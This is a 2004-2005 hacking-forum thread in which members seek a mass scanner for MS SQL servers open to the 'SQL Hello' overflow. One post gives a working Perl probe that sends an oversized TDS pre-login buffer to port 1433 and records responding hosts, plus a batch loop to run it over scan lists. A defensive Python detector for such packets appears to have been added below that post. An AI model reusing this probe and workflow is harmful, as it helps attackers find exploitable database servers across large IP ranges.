Best Sql Hello Vulnerability Scanner

#31 User is offline   perky 

  • Private First Class
  • Group: Members
  • Posts: 32
  • Joined: 05-October 04

Posted 31 October 2004 - 10:59 AM

ok ! <_<
0

#32 User is offline   tuttefrut 

  • Private
  • Group: Members
  • Posts: 13
  • Joined: 17-December 03

Posted 02 November 2004 - 04:28 AM

Quote

Just make a portscan 1433 with a usual portscanner like scan100 500 or 1000

but then u have to check all IPs for vulnerability
if you have a "sql hello vulnerable scanner" you know which IPs are vuln. and unprotected ...
that saves a lot of time when you are working with a large scanfile
0

#33 User is offline   Source 

  • Private
  • Group: Members
  • Posts: 16
  • Joined: 15-October 04

Posted 02 November 2004 - 10:12 AM

tuttefrut, on Nov 2 2004, 12:28 PM, said:

Quote

Just make a portscan 1433 with a usual portscanner like scan100 500 or 1000

but then u have to check all IPs for vulnerability
if you have a "sql hello vulnerable scanner" you know which IPs are vuln. and unprotected ...
that saves a lot of time when you are working with a large scanfile



True

Or if someone has a batch file that will work with Dfind or something. Something that will check the IP list to see if there are IPs vulnerable to the hello exploit.

any ideas?
0

#34 Guest_NoRRiS_*

  • Group: Guests

Posted 04 November 2004 - 01:57 PM

tuttefrut, on Nov 2 2004, 12:28 PM, said:

Quote

Just make a portscan 1433 with a usual portscanner like scan100 500 or 1000

but then u have to check all IPs for vulnerability
if you have a "sql hello vulnerable scanner" you know which IPs are vuln. and unprotected ...
that saves a lot of time when you are working with a large scanfile


Yes, a real SQLHELLO scanner would be better
But no SQLHELLO exists or it's private ^^
0

#35 User is offline   amnesia 

  • Private
  • Group: Members
  • Posts: 4
  • Joined: 13-November 04

Posted 14 November 2004 - 05:57 PM

iiiemuiii, on Sep 24 2004, 08:04 AM, said:

that's just how fast the scanner works.  i scanned about 2000 ips in 5-8 seconds.

also u need to make sure the contents in your file must be just the ips.


the attached file is missing. can someone attach it back please?
0

#36 User is offline   gunknown 

  • Private First Class
  • Group: Members
  • Posts: 32
  • Joined: 13-November 04

Posted 22 March 2005 - 09:22 AM

EzMe, on Sep 23 2004, 02:13 AM, said:

Usage: sqlhelloscanner2 scan.txt yourip > results.txt


You have to enter your IP, so I think the scanner works with a connect-back exploit to test for vuln. On which port does it connect back?
Am I right that the sqlhello source code is still private?
0

#37 User is offline   touk 

  • Private First Class
  • Group: Members
  • Posts: 94
  • Joined: 11-February 04

Posted 23 March 2005 - 06:50 AM

#!/usr/bin/perl
# code by touk
# for MxMx & GSO
# Vulnerable hosts are in vulnerables.txt
# This file needs to be named: vcsqlhello.pl


use IO::Socket;
use IO::File;
use Getopt::Std;
getopts('s:', \%args);
if(!defined($args{s}))
{
print "00ps, vcsqlhello.pl -s ipaddress!";
exit;
}
$serv = $args{s};
$bof="\x12\x01\x00\x34\x00\x00\x00\x00\x00\x00\x15\x00\x06\x01\x00\x1b"; #header
$bof.="\x00\x01\x02\x00\x1c\x00\x0c\x03\x00\x28\x00\x04\xff\x08\x00\x02"; #header
$bof.="\x10\x00\x00\x00"; #header
$bof.="\x00\x24\x01\x00\x00"; #tail

$bof.="crap"x560; # crapmsg
$remote = IO::Socket::INET->new(
                   Proto       => "tcp",
                   PeerAddr    => $args{s},
                   PeerPort    => "(1433)",
               ) || die("[*] Server Down?\n");
print"[*] Sending VC string\n";
$remote->autoflush(1);
print $remote "$bof";
print("[*] All Done...\n");
$remote->recv($answer,4096);
   if($answer ne '')
   {

print "[*] Vulnerable";
$resultfile = "vulnerables.txt";
$fh = IO::File->new("+>> $resultfile")or die "Couldn't open $file for writing: $!\n";
open(FH, "+>> $resultfile")                                 or die $!;
print FH "$args{s}\n";
close(FH);
}
else{
 print "[*] Not Vulnerable";
 exit 1;
}
sleep(2);



autochecker.bat : FOR /F "tokens=1* delims=," %%i in (scan.txt) do vcsqlhello.pl -s %%i
0
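
From the defender's side, the packet in the post above is a TDS pre-login (type 0x12) whose header declares 52 bytes (`\x00\x34`) but is followed by 2240 bytes of filler, and that mismatch can be flagged in reassembled TCP/1433 traffic. An added example, not part of the original thread: a Python check run over constructed sample payloads; the function names, the 512-byte threshold and the assumption that `payload` is the client's reassembled first flight are this example's own.

```python
import struct

TDS_PRELOGIN = 0x12   # TDS packet type of the pre-login ("hello") message
TDS_HEADER_LEN = 8    # type, status, length (big-endian u16), SPID, packet id, window
MAX_PRELOGIN = 512    # assumed alert threshold; tune to what your clients send


def parse_tds_header(data):
    """Return (type, status, declared_length), or None if data is too short."""
    if len(data) < TDS_HEADER_LEN:
        return None
    ptype, status, length, _spid, _pkt, _win = struct.unpack(">BBHHBB", data[:8])
    return ptype, status, length


def check_first_flight(payload):
    """Inspect the client bytes sent before the first server reply.

    Returns a list of findings; an empty list means nothing suspicious.
    """
    hdr = parse_tds_header(payload)
    if hdr is None:
        return ["short: fewer than 8 bytes, not a TDS header"]
    ptype, _status, declared = hdr
    if ptype != TDS_PRELOGIN:
        return []  # other TDS packet types are out of scope here
    findings = []
    if declared < TDS_HEADER_LEN:
        findings.append(f"bad-length: declared {declared} is below header size")
    extra = len(payload) - declared
    if extra > 0:
        # A client normally waits for the pre-login response before sending more.
        findings.append(f"trailing: {extra} bytes beyond declared length {declared}")
    if len(payload) > MAX_PRELOGIN:
        findings.append(f"oversized: {len(payload)} byte pre-login")
    return findings


# Constructed samples (not captured traffic).
_body = b"\x00" * 39
NORMAL = struct.pack(">BBHHBB", 0x12, 1, 8 + len(_body), 0, 0, 0) + _body
# Same shape as the probe in the post: 52 declared, 41 header bytes + 2240 filler.
PROBE_LIKE = struct.pack(">BBHHBB", 0x12, 1, 52, 0, 0, 0) + b"\x00" * 33 + b"A" * 2240

if __name__ == "__main__":
    for name, sample in (("normal", NORMAL), ("probe-like", PROBE_LIKE)):
        print(name, check_first_flight(sample) or "ok")
```
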

#38 Guest_blumaster_*

  • Group: Guests

Posted 29 March 2005 - 03:59 AM

I think that for me the best scanner for sql is Xray, but I'm also using Xscan with a modified .dat file where the user and password are.
0
